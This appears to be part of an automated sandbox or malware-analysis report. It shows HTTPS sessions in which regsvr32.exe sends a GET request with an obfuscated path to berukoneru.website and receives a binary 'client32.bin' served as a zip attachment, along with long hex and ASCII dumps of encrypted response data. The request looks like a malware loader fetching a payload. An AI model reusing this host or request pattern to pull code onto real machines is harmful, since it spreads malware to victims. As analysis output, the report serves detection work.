                          2021-12-14 09:34:07 UTC709INData Raw: 1a 8b 8a c2 67 70 7e 71 54 68 79 73 a5 4e ab e3 4a b0 c0 35 cc 84 e5 09 8a 2d d4 b3 61 5c 7c a2 69 40 6d 93 fe 19 95 f1 37 72 e3 a4 cc e1 46 00 36 ad 08 70 09 48 ee df 28 59 f1 dc 84 d8 a6 88 9b 81 17 8e ac 5a 38 1e e3 b0 2c 58 88 bc 3c cc a0 d1 3f c9 e2 cd 71 82 5a a1 c4 49 0c ab e1 5d d1 4f 54 3c 7d a2 ed c9 e0 f5 88 65 0a 91 c0 51 f6 39 73 4c 95 3f e6 b4 ce f9 ff 68 3d da 15 d4 a3 b5 3e 9b f4 35 b5 15 04 36 86 d2 ec 26 ef ad 43 d2 da 21 a2 d9 f4 d3 7e 4c 68 aa bd 8e 8c d2 db 21 9d 03 68 fe f0 e3 c2 17 82 dc 14 81 fc 68 d1 32 7e 48 88 4d 6d a1 89 03 19 4f 65 74 d5 22 c5 7b 46 5c 8e e0 12 37 09 9f 86 e4 8c 00 7a 9c 9e 4c 98 c5 39 45 26 d1 e9 44 94 ff c8 ca 5c a2 f4 33 0d 2a aa 1f d3 4c 1c 0c 3f f3 08 7b a3 eb 7b e7 59 b5 5b bf cb 25 9b 11 72 93 d9 2d e6
                          Data Ascii: gp~qThysNJ5-a\|i@m7rF6pH(YZ8,X<?qZI]OT<}eQ9sL?h=>56&C!~Lh!hh2~HMmOet"{F\7zL9E&D\3*L?{{Y[%r-
                          2021-12-14 09:34:07 UTC725INData Raw: 33 c3 d5 ab 38 83 31 57 4d b0 0c 3c fc 3e 4f d3 9b 72 a3 e4 0c 6c 08 2f ff a4 6c 6a df b6 8c 7b 24 68 b0 0e d2 05 e2 f9 41 46 ca 15 b9 b7 02 0c e3 58 ba 11 31 8b ba 02 3a 0c 84 d5 36 ab 65 24 1f f9 e2 0f 83 47 9a 22 6f 31 de 9f 0f 48 b3 c9 db f9 ab 1d 27 e9 c5 83 98 15 d7 6c 93 b7 0e ed 5f c9 d9 03 df 84 ce 07 03 28 39 eb db c4 21 50 9c 97 90 2c 76 af c5 99 4a 54 f4 ba 0b 5d 24 61 50 81 c0 d8 7d 07 a2 e1 6b 26 5f 8b 7c 88 95 2c 76 4f d0 70 dd 80 88 86 50 b0 40 ad 95 3b 12 bc 72 7c d5 0a 64 6a 9b 5a 3c f4 3f 02 57 75 f9 dc 0a 2e ff 75 10 53 d2 85 61 8f 3f 50 d0 35 57 1d 0c 50 9d e4 f5 fd 6c 84 5d 36 96 76 96 d2 ff 6f b3 fd 55 53 1a c3 bf 4b b6 27 2d e6 3c 55 80 81 fc 5e 8c 97 1a f2 df 24 a3 b6 a9 d1 ef 67 e5 8d 7a 95 79 f4 9d 6e 17 78 d6 28 d0 4a 03 fb b4
                          Data Ascii: 381WM<>Orl/lj{$hAFX1:6e$G"o1H'l_(9!P,vJT]$aP}k&_|,vOpP@;r|djZ<?Wu.uSa?P5WPl]6voUSK'-<U^$gzynx(J
                          2021-12-14 09:34:07 UTC741INData Raw: 36 0c 6a 47 30 19 9c 4e 22 85 cb 33 b8 3c 86 72 6e eb c2 7f 61 f3 63 c9 32 ed 9a 6c 4e 71 21 a3 96 09 5b 1b f6 91 d8 af 7f 12 2f 29 bb 70 ab 1e 8f 4e 86 79 ad f6 43 a3 93 18 7d 1f cd c9 74 b0 36 46 e2 59 f2 66 4d 73 8d 51 79 81 72 ed e3 8b 3b 3c f9 23 bf 04 38 63 7f ed 81 2c 3c 66 e8 4d 85 47 dd da 40 0d f8 54 73 09 8e e5 8d 8d 56 86 3b 42 a5 20 c3 4d 3d 63 e6 81 2e d5 06 d0 40 d4 9b 0d 1b 77 b1 b5 59 66 f4 f3 d3 f0 a4 6a 03 8b d6 85 61 23 74 bb b4 54 a1 fa 5a 96 88 0d 48 0c 10 fc a7 55 bb fe 20 0d e3 f2 af 1a c5 61 fe 3f d1 72 04 af a2 d5 4c 24 76 71 d3 2c 1d 01 cc 92 44 5b b1 61 ea 2f e9 d5 61 5a c7 1d 6f 06 ad 68 4f d1 aa c8 64 89 7c 2f a9 56 0d 9e 5a 98 51 aa 2c 0b 5d 83 9b 9f 16 c2 e5 71 51 02 ea cc 84 39 90 e7 3b ce f7 eb ee e7 16 20 5a 10 d9 b7 22
                          Data Ascii: 6jG0N"3<rnac2lNq![/)pNyC}t6FYfMsQyr;<#8c,<fMG@TsV;B M=c.@wYfja#tTZHU a?rL$vq,D[a/aZohOd|/VZQ,]qQ9; Z"
                          2021-12-14 09:34:07 UTC757INData Raw: f2 e5 3a cd 32 2d ed 92 9d 3f 9d f5 64 8d 06 c5 e4 93 7f 3e 78 36 95 1c 30 12 88 9a 97 7e 9b 10 03 a4 d9 d5 b1 65 9e 77 c5 87 e2 43 68 be db 1f 8e 2e a5 55 62 3c ec df 5b 5e a5 61 b7 69 0c ae ee 83 66 7a f5 00 74 70 c2 44 a6 a0 92 0c 66 fa b1 20 92 77 bf 47 29 d0 51 4a 32 10 65 09 54 81 4f ca 93 25 3b c8 e6 6b f3 3d 7d 97 d1 00 ae 70 9d 06 59 3e 67 79 35 74 ea a1 ac 3c 5d 64 44 b3 02 ea 1a ec 16 0e 15 85 65 8c 11 2a 09 43 5a ad 8a 26 10 f6 44 b8 5c 39 ac e8 dc 38 55 3d 16 98 7a 7d 69 fb c6 57 64 49 89 04 01 eb bc 13 9b d2 51 58 5b b1 c4 77 7c 6c b9 4d 8e af 08 97 af 13 96 8a 13 dc 5b 85 ee 1d d9 f1 cb 2e 8d 50 2f 90 1a 74 47 9d 82 de ef bb d5 4b 2a 1c 36 7f f6 20 e8 e6 00 2f 63 53 d2 32 c8 6f 20 15 e4 5b ee d7 c5 b4 29 0f ad c9 4a db d2 7e b9 b1 d9 bf 4a
                          Data Ascii: :2-?d>x60~ewCh.Ub<[^aifztpDf wG)QJ2eTO%;k=}pY>gy5t<]dDe*CZ&D\98U=z}iWdIQX[w|lM[.P/tGK*6 /cS2o [)J~J
                          2021-12-14 09:34:07 UTC773INData Raw: 20 73 2e 57 0e da 3c 5f 79 54 cf f8 d9 3a ac c6 dd 9b d7 a4 39 61 8d 95 a4 49 72 7c 27 f5 8b 31 15 bb b1 a4 98 cd 3b 78 40 00 11 29 d8 f3 40 3f e5 24 c7 d0 44 db 15 b8 d0 20 72 e0 9d 97 4a eb ec 4c 78 60 b4 20 69 c7 26 d6 35 1e de 8d c2 21 c5 97 6d 4b a5 c3 49 16 5b d8 a6 e0 0f f2 84 9c d1 79 c0 82 53 97 59 e0 08 c2 cf 30 12 b5 5c 01 b9 dd c2 ee c3 36 24 f8 c7 cb e1 8a c7 fc 03 78 4b 1d ee 0a 44 0a 49 e0 cf 70 92 83 7c e4 ea 46 eb b2 dd eb 84 d1 99 14 0d de f8 64 26 f1 4b 89 99 b9 8e 38 6f 50 7d c3 4d a3 5a 10 f5 76 a0 20 0d 92 21 d1 72 f9 e7 a4 63 ff d0 b6 6b 3d b8 b2 cb 9f 53 83 29 ca db b3 aa f0 99 4c c0 77 df 06 d3 91 a4 f3 f3 97 a2 4b d3 ef 25 5c 44 cb 53 4b 0c 61 51 72 38 97 7d aa 8f 25 bb 4f 4d e7 f3 1b 93 67 be 35 a7 6d 10 26 d0 e9 75 49 03 9b fe
                          Data Ascii: s.W<_yT:9aIr|'1;x@)@?$D rJLx` i&5!mKI[ySY0\6$xKDIp|Fd&K8oP}MZv !rck=S)LwK%\DSKaQr8}%OMg5m&uI
                          2021-12-14 09:34:07 UTC789INData Raw: 36 19 cd 54 79 36 2b 6b 10 11 75 b0 3e 40 37 97 94 7d b3 d1 b3 ee 09 71 72 a8 16 9f 4c 06 27 52 09 90 a7 65 25 a4 a4 57 68 42 27 dd 6a 76 21 5f b3 5f 82 fe 88 df 67 74 1f 96 b4 23 a0 83 08 c2 ae 2d 1b fc ae e5 20 42 94 8a d8 7b d9 9b cf c3 7d 90 4b c0 21 97 33 34 d0 18 df fd d8 62 17 9d 9f 04 23 01 17 72 ad d8 e3 c8 36 ab ab 9c 6d a6 22 8a 34 fe 50 67 53 c5 95 c5 00 5e 38 04 78 1c ea fa f3 22 1e 4b 90 85 1f bb 19 f3 e4 1a 2e 5a d5 ee 09 ea 8a 92 12 37 4d 76 8c 5e 86 9a f6 0f 83 42 3d 9c 00 f1 3f 0a b2 7c 5a 8b 07 84 14 3c ee 7d ba 94 3d 04 25 74 dd 76 52 55 08 a3 7a 93 c7 7a 1d ab 8d 97 0e 87 eb b0 78 a9 b1 ef 0f 66 80 8a a6 12 cd 21 8a d8 66 2c bb 2d 78 c2 f3 b8 a0 53 6a 08 0a 6f d7 94 8a 1c 08 1b f7 0c 22 8d 33 21 1c 41 72 82 67 54 6c 50 cb 57 a0 17 74
                          Data Ascii: 6Ty6+ku>@7}qrL'Re%WhB'jv!__gt#- B{}K!34b#r6m"4PgS^8x"K.Z7Mv^B=?|Z<}=%tvRUzzxf!f,-xSjo"3!ArgTlPWt
                          2021-12-14 09:34:07 UTC805INData Raw: 0e 82 3b 28 5c 8a 23 f3 fe ac ea 89 97 4f fd 45 07 36 35 55 85 5f e4 c1 68 4d fa b0 54 a3 22 04 98 4f c7 b5 8d 23 7d b2 61 b6 31 34 20 b7 1b a4 d9 42 0b 7e 84 3a ce e7 2c 38 36 17 77 e7 e4 fc 2c 65 16 40 a0 54 34 a1 13 8a 38 48 80 ff 35 49 57 af 87 44 9a 1f fc e5 4c 13 ed 3a 2b e0 e7 ce 29 ed f9 71 81 2e b2 3f 69 f0 38 cd 38 b1 59 2a 92 fb 5c 83 29 11 0a e0 7b 1c 3f d2 c4 55 e4 71 e3 3c b5 7d 97 37 f4 89 35 3e 2a 90 9a 16 31 29 0e b4 2a 40 26 4c aa 45 d5 c7 d8 27 6a 16 b1 9a 67 61 41 a1 1a ba 9f 70 6e 9e e9 48 f7 c2 cc 52 c9 00 75 56 16 a2 d2 83 54 8f f5 d3 27 87 8d e6 67 d7 b0 37 8c b1 38 87 6b 58 e8 12 fe ec 00 2d fd 70 73 31 4e 6a 42 32 85 39 f6 e8 5b 9a 34 07 d7 bd 73 ea cc e2 da f0 8c 8d 5c ca 99 14 9d fd ba a1 e0 ed 4d 03 be 96 69 17 e0 56 c7 1f 7f
                          Data Ascii: ;(\#OE65U_hMT"O#}a14 B~:,86w,e@T48H5IWDL:+)q.?i88Y*\){?Uq<}75>*1)*@&LE'jgaApnHRuVT'g78kX-ps1NjB29[4s\MiV
                          2021-12-14 09:34:07 UTC821INData Raw: a0 19 9a db e6 23 d3 03 86 6f 75 af 47 d5 3f 20 85 14 19 0e b9 d4 63 8c fd 8a 9a af a9 f6 65 42 84 ce cc f3 73 04 88 70 20 03 2e 2d 3a f5 0f cf 45 fe 85 b5 60 0f 38 e4 0f 37 bc bf 4d f6 2c 45 a8 31 d4 65 37 db a7 ee c6 e6 95 0e bc 4a 8a 34 9d a4 0d 59 51 52 14 5c c1 0f 3c ec 47 b1 68 4c 80 4c 71 0c 20 bb b6 5b 7b d7 49 8d 03 7d d5 bb ae cc 8b d0 d0 02 e9 5a 65 53 ae 1e 2c a6 43 6e e2 1e c5 78 ff 67 8f f0 0d d1 d9 1e 13 2c a2 1d df 57 0b e7 72 4f c1 4e fd ee 99 04 21 c1 02 12 96 53 77 8d aa 83 93 27 ff a3 34 86 54 2e 18 ab 65 1d 56 65 e7 f0 fa 9f 11 fb 79 79 cc 44 ad 4a 13 67 7c 78 91 1b 35 3c f6 1d 35 63 f5 35 af 82 78 1c 11 a5 0d 76 24 5c 35 8e 9a 62 ca eb d1 dc 7d 1a a1 82 c4 f1 29 ea 1f 1c 46 3e 42 d1 69 f2 f0 01 dd e9 6b 1b 07 ff 17 68 ac d1 b5 48 8c
                          Data Ascii: #ouG? ceBsp .-:E`87M,E1e7J4YQR\<GhLLq [{I}ZeS,Cnxg,WrON!Sw'4T.eVeyyDJg|x5<5c5xv$\5b})F>BikhH
                          2021-12-14 09:34:07 UTC837INData Raw: 15 93 b0 c9 e5 45 68 a6 ac b4 73 14 04 8b d2 73 37 da 94 58 af 8c 71 a1 da 98 2f 7a 5f 00 68 57 45 4d 6b 23 a3 df ac b7 08 22 c0 21 92 9d 91 8b 92 62 0b c1 a4 d9 31 21 b2 82 fc 16 c3 c2 2c e6 f2 c9 7b 9e ed 62 e8 b1 c5 94 41 f1 99 7a db 30 24 96 ba 10 ac d7 87 21 08 bd c6 d3 02 47 9e 4d 19 3c 56 18 b8 86 af af 82 b6 d8 04 fc 7b 26 3f 88 0f 78 4b de 4d cd 3d 2d 67 48 53 e0 e8 f4 57 ba fb ab 11 65 6b 3f 5a 74 66 d8 6f cd a5 55 54 84 d7 84 2a 96 f0 7b ba fb 3a 40 ae 9a 7e 21 6d 09 fa 90 30 cc af f9 65 a6 50 8e 9b d2 63 fb a0 1f ac 48 d8 90 99 cc 91 db b9 d3 5a f0 df 5d f6 67 0a fc a1 83 ac 70 74 61 2d 1d 54 6f de e8 e2 75 10 9c ed a3 3d b9 89 38 fd 44 93 dc bb be 2a ee 11 5f 06 2e 3b 9d 7d 2a 31 15 93 0e c2 16 3f a1 08 92 6c 38 1e dc 9a b9 14 3b 62 e8 ab b8
                          Data Ascii: Ehss7Xq/z_hWEMk#"!b1!,{bAz0$!GM<V{&?xKM=-gHSWek?ZtfoUT*{:@~!m0ePcHZ]gpta-Tou=8D*_.;}*1?l8;b


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          4192.168.2.54979979.110.52.144443C:\Windows\SysWOW64\regsvr32.exe
                          TimestampkBytes transferredDirectionData
                          2021-12-14 09:34:07 UTC838OUTGET /tire/iL5Q0EgKDzXlIJvSVY9Fa72/roFEnyYEEO/BTl6hhjqhLPztNm87/ClBTSTJ24YQi/659nN8frXqL/KI_2BmGQcF3l8a/UPJEdWRElF2Ck7h3GrI7f/Jn4UaIHKOCKly3pR/5WtUgfhtCob3WA8/8RFl0SkPd8NK0tapfV/Bv03ARxcw/T6wxTs3S_2BFMRgrZw2Q/_2BV_2F7vXjmj/i.eta HTTP/1.1
                          Cache-Control: no-cache
                          Connection: Keep-Alive
                          Pragma: no-cache
                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                          Host: berukoneru.website
                          2021-12-14 09:34:07 UTC838INHTTP/1.1 200 OK
                          Server: nginx/1.20.1
                          Date: Tue, 14 Dec 2021 09:34:07 GMT
                          Content-Type: application/zip
                          Content-Length: 268426
                          Connection: close
                          X-Powered-By: PHP/5.4.16
                          Set-Cookie: PHPSESSID=tfmpovqco4irtlnkvm30nfl1s5; path=/; domain=.berukoneru.website
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: public
                          Pragma: no-cache
                          Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:34:07 GMT; path=/
                          Content-Transfer-Encoding: Binary
                          Content-Disposition: attachment; filename=client32.bin
                          2021-12-14 09:34:07 UTC839INData Raw: 58 1b 91 63 b8 aa 05 14 26 b5 4a 87 75 c1 a0 26 9e 3c 11 6e 71 42 96 26 99 7a 08 52 54 2f 31 7f 58 90 87 ef 21 eb 4d ac aa 62 d0 f5 9e 65 dd b1 86 a9 14 c8 ae 98 d4 b6 d6 60 d1 47 77 cd be 8c 6e b1 66 d1 e8 7a 10 1e c8 8c 97 db c5 0f 0b 40 05 e7 84 c2 c8 34 df 33 e6 dc 52 e3 46 f4 95 b7 af 93 01 65 a9 71 60 bf 1f 51 95 4a f0 de 35 3e 05 cd 02 6e e9 85 80 bb d0 9e 8a 75 b1 3b 1e 78 47 1f 6b 12 e2 6d 4a 11 60 95 cc b0 70 f1 9e 77 55 2f 09 91 10 e8 d7 e3 05 c1 1d c9 ea 2f 96 3d 82 e8 0e ae b5 77 75 a5 0d bc 2f f1 b6 c5 47 94 e1 2d 77 eb d0 a1 8b a7 ad 18 90 fa 77 82 10 81 a4 59 32 4a 80 82 20 cd 7d 1d 20 6f 17 d7 8e 41 9a d0 fb 32 98 6c 3b da 81 8e 51 5e cb e0 92 a7 47 9a 9d c8 4d ed 20 99 cb 03 c1 2b 49 00 fa b7 08 c4 02 c1 94 c4 b3 eb 0b 87 5e bf 36 f0 75
                          Data Ascii: Xc&Ju&<nqB&zRT/1X!Mbe`Gwnfz@43RFeq`QJ5>nu;xGkmJ`pwU//=wu/G-wwY2J } oA2l;Q^GM +I^6u
                          2021-12-14 09:34:07 UTC854INData Raw: 53 07 cb b8 4e 62 9c b0 52 21 3d c4 3d 76 91 43 af 38 7c 50 14 41 e7 bd 39 dd 41 f5 8b 56 ab fc e5 6d c6 be ea b9 6f ac 49 c3 e4 fc 2c 2e 24 77 88 18 d0 d6 0d e2 48 70 d9 46 b0 89 af 38 9c 24 3c b1 b0 63 e5 b0 08 90 17 71 54 ef f8 87 9d 1e 42 a7 fd 9a 63 c3 82 40 5b b8 56 fe 88 58 4d 03 7b 4a c1 3e 01 55 8d a2 04 94 51 bf c3 70 6b d2 e2 08 64 3d df 31 53 f8 f6 69 5e 2b 60 1e 2f 64 eb a0 41 2e cb 53 06 1f a2 63 54 77 f5 61 29 3a 5a fb 59 8c ff 2a c8 82 0d 0a b0 a7 75 fb 71 92 04 b8 69 03 b4 45 51 d3 95 71 f0 db 15 b4 fb c5 0d 33 ef a0 0b 56 c4 42 43 9e a7 a1 d1 7f 09 fe c9 cc 52 6e cb 80 08 2a 8e a8 9e fd e5 c4 23 ad ed bd 3e 84 71 6f 32 b7 23 76 bd f0 aa 04 aa 58 67 b0 ae 2d e0 9e 97 be 39 61 1a 42 24 de 9f 09 a5 12 54 85 a1 89 71 fa a7 21 f9 6e ff 48 25
                          Data Ascii: SNbR!==vC8|PA9AVmoI,.$wHpF8$<cqTBc@[VXM{J>UQpkd=1Si^+`/dA.ScTwa):ZY*uqiEQq3VBCRn*#>qo2#vXg-9aB$Tq!nH%
                          2021-12-14 09:34:07 UTC870INData Raw: e7 b0 40 b0 31 3b 8f 49 34 9e 9d 07 a7 2a 47 1a 98 b8 bb ef 61 5f ed 3e 4c 3b 59 ec 5e 3a 76 d9 c1 67 5c 2e 34 de 0d 85 63 85 90 eb e4 ee a5 b8 ce e5 27 ab ed f1 46 e0 2a 79 16 27 a9 fc b8 cf 65 bb bf d4 90 e2 e0 3c 0b de e6 54 f2 ef 2e be 6b fc 2c 61 d4 bc bc 78 9e 57 3a 13 f3 b3 15 e0 74 c2 74 c3 e1 7a b9 e4 c1 3b 07 41 66 37 d9 18 e3 65 ba 35 bd 4f 40 fc 90 eb c9 45 3c ed ba 8f 96 10 0b e4 14 da a9 b8 8c 11 b2 96 cf a0 6d af e4 4f c4 a4 69 fd f3 64 92 ef 16 b1 cf c1 d4 e9 4f 21 c8 1b 40 8e f5 06 bb 3f a1 f0 76 28 07 ee 59 f8 cd 20 06 01 fd e9 a0 fc 2d ee dc 88 96 0b 46 af a1 33 eb a0 c7 4e a9 5c 03 33 28 8c ca 8f d8 6c 19 1d 8f 80 97 7e b9 38 71 06 4f 9b c4 2d f9 c3 af 26 49 23 e0 0a 10 0e 09 e0 18 f6 ae d4 cb 86 15 1d 08 c5 ff e8 8d 3d 16 53 16 b4 c9
                          Data Ascii: @1;I4*Ga_>L;Y^:vg\.4c'F*y'e<T.k,axW:ttz;Af7e5O@E<mOidO!@?v(Y -F3N\3(l~8qO-&I#=S
                          2021-12-14 09:34:07 UTC886INData Raw: 45 db 6c 2a 63 aa 06 70 d0 6b 08 5b 47 fa c5 46 f3 38 99 a1 5d cc ba 11 e3 7e a5 1e 73 fb a9 d1 cb a2 38 03 98 b3 a6 13 bd fa 0c bd cb 3d 30 a4 92 94 e1 ea ba 97 05 66 b9 79 98 c6 56 aa 73 54 58 3d c0 60 d7 30 76 6d 4f e1 cb d0 a7 7b 54 a9 1f f1 d3 15 64 69 54 3b 42 6f a0 02 ae 6e 26 9b 48 e2 07 8c cb 20 9e b8 e7 5f b5 44 63 51 8f cc 68 40 45 da 42 e1 26 c3 48 56 35 4f 6e c9 96 89 0c c7 f1 ba 24 ba 83 f0 45 05 98 ec 4a 92 f6 f3 44 8a 27 ff 23 80 ae 70 e7 ea 9f cb 0a ab 3f 5e 7f 1f 38 05 43 d0 fd 66 cf ed 46 fd dc 7c 23 bc bd 8c 68 7d 4d 99 6f e0 32 34 87 aa c5 a8 35 09 d2 c7 60 38 ac 2d 95 b3 ee 1f c1 52 22 e6 12 b0 07 3f a8 53 75 fa ff cb b8 9a ac c4 ce 88 1b 59 1d 72 ab a4 6b 2b 17 94 74 4b 8e 70 9e 76 ff 8b 6c 0c 30 0b 09 54 f3 70 a5 8a aa 43 01 be 96
                          Data Ascii: El*cpk[GF8]~s8=0fyVsTX=`0vmO{TdiT;Bon&H _DcQh@EB&HV5On$EJD'#p?^8CfF|#h}Mo245`8-R"?SuYrk+tKpvl0TpC
                          2021-12-14 09:34:07 UTC902INData Raw: b9 b3 89 36 a0 10 70 11 ee 76 04 aa f4 39 8a 26 d4 29 d7 d0 ba bb d2 9e ff 36 cc f6 8b 3a 1a f6 f1 07 b3 88 26 61 19 fa 05 f4 86 56 44 b7 bb d2 49 24 96 90 b9 8d a7 e0 88 c2 e4 b3 80 23 5a 22 bf 34 49 c2 2b 10 c7 df 0e e7 7d b2 2c 46 10 12 fa 63 8d 6c 77 94 24 a1 1f 78 d0 cc 65 5b 7c 8a d7 ba 5e 54 fe e7 bf a4 3a f2 31 5a 79 3e a4 48 aa 3d d5 6a ee a2 62 1e 62 a8 4c 65 ce 69 6b 81 6e e1 9e 3c 50 8d 5b bf 47 41 9f a8 b8 98 6f 92 de 70 83 81 ea ef e4 df c4 31 d6 84 a7 5d 99 6f 78 56 b8 1c f8 44 db b5 1d a0 95 e6 0c 26 aa 44 86 22 aa 52 ae 80 ee f4 41 9c 26 7c 67 ed a8 4e 37 b5 7e f6 f0 ea ce 5f c5 06 cb 55 9c 65 9e c7 e8 00 a6 00 43 1a f8 e2 6f 8e 1e 8c 65 88 0b 33 05 85 4a 32 5e 64 82 e4 67 70 43 e5 fc d0 07 dd 85 66 6d 6b 0c 68 07 1f 46 f8 ba c6 55 80 cf
                          Data Ascii: 6pv9&)6:&aVDI$#Z"4I+},Fclw$xe[|^T:1Zy>H=jbbLeikn<P[GAop1]oxVD&D"RA&|gN7~_UeCoe3J2^dgpCfmkhFU
                          2021-12-14 09:34:07 UTC918INData Raw: 78 71 76 31 33 bc b7 0d c3 de 27 b9 e0 41 88 eb d3 68 96 04 e0 a3 0b 36 53 fd 2a 4d 2f 82 25 1c 70 e4 3f df 1e b6 ee 36 26 e8 83 d9 db 55 4a 5f 9e fb 35 bd 90 d8 cf e2 60 85 21 8a ca e3 72 a8 a1 08 41 78 fc 7c 2c 27 f4 20 a9 b9 fd 24 f1 24 3f fe 94 22 1f 4a a2 89 18 ac ac 87 3a b3 37 10 5d f7 83 1a 75 a9 ca d7 19 08 20 be 46 78 23 ed 7e 89 c7 b2 59 87 53 ec 33 70 85 97 13 b5 7b 44 20 9b 67 94 ea 69 ac ac 4d db 54 a3 61 cf a9 0d d8 10 67 82 3d 2b d5 9c 21 be 3f e2 16 18 9d e4 78 52 a4 7d c6 8a 77 73 ce 0f b4 37 7f ca a5 b1 be 65 af f7 f4 af 6b a3 bd c2 a1 b2 f9 52 59 8c bd d6 6d 1b 49 59 57 cb 23 8f 9f cb 4a a3 12 7c 63 ae 4c d0 f6 f5 da 3d f5 51 94 3f bb e3 b9 56 cd 1e 4a 19 99 fa 31 9b a4 51 ac 78 89 24 c2 e1 9f c5 ab 4d 38 7d 98 e0 38 fc 6d fb 7f d9 88
                          Data Ascii: xqv13'Ah6S*M/%p?6&UJ_5`!rAx|,' $$?"J:7]u Fx#~YS3p{D giMTag=+!?xR}ws7ekRYmIYW#J|cL=Q?VJ1Qx$M8}8m
                          2021-12-14 09:34:07 UTC934INData Raw: b4 60 44 97 27 1f 21 1f d0 2f ee 48 10 3e c5 6c 33 ba ab 56 30 71 11 00 92 c5 c1 bc 66 45 ac 84 d1 09 08 c1 a4 6e fa a9 3d bd 53 ba 60 d9 86 1f 61 02 41 f1 b4 f1 a3 4e 1f fb 49 76 1a 69 04 18 96 d5 40 41 0f 01 30 43 c5 3a 64 c0 69 40 59 d0 79 72 63 bf 4e b6 d6 5f 07 58 61 f7 90 a4 f9 08 c9 da 62 84 96 47 39 af 7a 24 a8 3f 44 47 80 46 6e 86 1b c4 f1 8b 20 c8 b5 ff 9d 59 83 72 67 dc 53 42 27 f8 dd 5c f8 ec 3f f3 9d df 40 c3 59 19 b9 61 5d 0a d0 76 4a ba fe cb 76 15 05 42 32 43 76 df 71 a5 91 73 4c 46 d6 87 eb c9 66 a6 96 7b 6d fe f6 ca de ff 88 d0 f6 e9 f5 04 48 89 18 70 91 a4 2b 83 db 4b d3 1c 1c f5 ba 0f d9 39 57 5a 1f 17 c4 00 79 61 af a5 a6 0e a0 e8 de a4 96 86 bf bd 5b f9 2d 27 92 80 fe 63 93 0c b5 49 f5 38 79 ac 61 63 9c 01 f1 ee df 76 f8 e5 83 7e 57
                          Data Ascii: `D'!/H>l3V0qfEn=S`aANIvi@A0C:di@YyrcN_XabG9z$?DGFn YrgSB'\?@Ya]vJvB2CvqsLFf{mHp+K9WZya[-'cI8yacv~W
                          2021-12-14 09:34:07 UTC950INData Raw: c6 16 99 f3 a4 fe 24 ea 90 c4 e0 29 ca cb 52 bf 65 c0 7a cb 51 b2 b2 b7 57 79 73 38 52 ba 5a bc 4c 22 40 1d 19 b5 1c 82 37 66 72 7a 08 22 07 27 40 84 8b 5e f6 28 53 e6 b4 ec 9b 67 a1 a7 03 8f 6c 4a 4d 12 c3 da 7e a8 53 51 f8 cd 89 8c b9 52 85 a1 d8 01 df 09 06 ee 13 00 0e a7 70 26 89 41 da 6d fb db 2f af 16 ad 02 d5 29 0a 4e cf c2 35 b6 0a 26 11 b4 f5 f2 82 4b dd b8 84 a8 aa 2a c9 ca 48 c4 34 61 bb 76 c0 de cb 0c 5c 8b c7 9f 3b 49 17 4c f5 8b dd 7a c1 0b 4a 35 d0 be ab f7 e6 a7 43 03 6e 29 c7 df 2d b0 79 31 f8 86 19 32 81 8e e0 4f 45 87 07 89 46 26 9a 65 b3 76 6f 12 77 fd 5d b6 98 f7 39 4f 6f 57 e1 a1 da 5f 6b 71 53 ad f0 06 c4 15 97 4e 02 e0 c3 33 22 01 d7 19 f4 6f 3d de 8d d9 4c 13 c8 e0 95 12 74 55 73 72 a5 5f 83 9d 74 b1 5b d4 c0 73 ee 7d 1f bf 73 a7
                          Data Ascii: $)RezQWys8RZL"@7frz"'@^(SglJM~SQRp&Am/)N5&K*H4av\;ILzJ5Cn)-y12OEF&evow]9OoW_kqSN3"o=LtUsr_t[s}s
                          2021-12-14 09:34:07 UTC966INData Raw: 8a 95 bf 32 84 5e 76 15 88 cd 1f 9d d9 af 1b 24 c9 22 47 79 35 37 09 c6 d8 7e 27 47 2e 10 a1 b3 5b 24 c7 aa a8 03 00 c5 f4 aa 54 55 49 85 5b 49 b2 cc a2 5a ff 21 cd f5 b2 48 99 9f 29 da 5e f5 ee 59 21 b3 7a 12 71 e8 77 cd 3b 1f a7 84 6b dd 6e 75 68 60 c1 ea 3c c3 d4 41 9a fe ae e6 34 bc 08 a1 46 64 26 66 4c 90 ed 50 d9 be c6 d5 7a 2c d9 b2 5a e4 f8 f8 8d 45 b3 2c 15 2c ad de c1 5a fd 4e 28 de 6a e9 ff c0 fd 35 e9 57 90 7c 6b b6 ea 1a 5a b1 76 15 34 93 69 f2 35 55 5a 0b 18 cd 6c f7 aa 27 6d 48 5c c9 9a d8 8f 58 c3 f7 bc bc 0f 9b 2c 71 e8 01 14 70 24 ed 50 5c 6f f5 1e b0 11 fd 45 15 69 45 3d 3a f5 85 b8 64 94 bb 5e 33 9c 63 8a 60 52 7f 2f 5d 5f e7 5b 8a 81 02 98 a6 97 ae 88 75 55 72 18 63 80 fc da 9e 79 b4 4f db e3 38 dd 8a df 4f ca 3f 74 56 fe 61 02 7f 87
                          Data Ascii: 2^v$"Gy57~'G.[$TUI[IZ!H)^Y!zqw;knuh`<A4Fd&fLPz,ZE,,ZN(j5W|kZv4i5UZl'mH\X,qp$P\oEiE=:d^3c`R/]_[uUrcyO8O?tVa
                          2021-12-14 09:34:07 UTC982INData Raw: a8 d4 95 b0 78 6a 51 c3 88 29 00 f7 a0 84 fe 40 04 18 2e ef 9c 27 9d fe 2e 7f 57 0f 47 7e 58 ad fd 7d c9 6e 23 3f 22 b2 a4 9f ed 28 62 16 d7 bc fb 23 4a 86 93 35 4e ab fa bc e6 cd f5 3f 33 fb 84 70 77 8d 54 5d a3 de 9f 6b 30 00 f1 82 7c dc 5f f2 1d 45 f3 19 55 be 0c 4c 1c 0e 7e fb f7 32 ed 48 d6 a1 49 ec 55 42 6d 91 57 f7 df b4 1a 0d b6 af 23 6b 5e d1 e5 f5 65 ba a7 5b 33 e1 0e 26 21 79 08 33 73 6b 85 13 c2 2a b4 92 5f db 48 5b c1 22 1e 4b cc 13 e8 7a a3 ed d6 6e 4e e8 f6 e4 cd b4 ab d2 6c 6c dc 9b 46 e1 b4 59 87 7d 59 de 09 28 18 da b7 a3 db 92 78 c3 bb cf e4 db bb 9b c8 20 82 fc e2 7b 61 40 74 fa 59 a4 48 a2 bd 7a 16 d5 4a 04 f5 dc 5d 96 8d 8e a4 60 4b d6 da 45 0d a5 7d 4a 3f c7 4a 7d 82 53 c3 fa 18 71 d6 d5 c7 21 14 7c bc 89 7c d8 6b b0 7e 18 fe 07 31
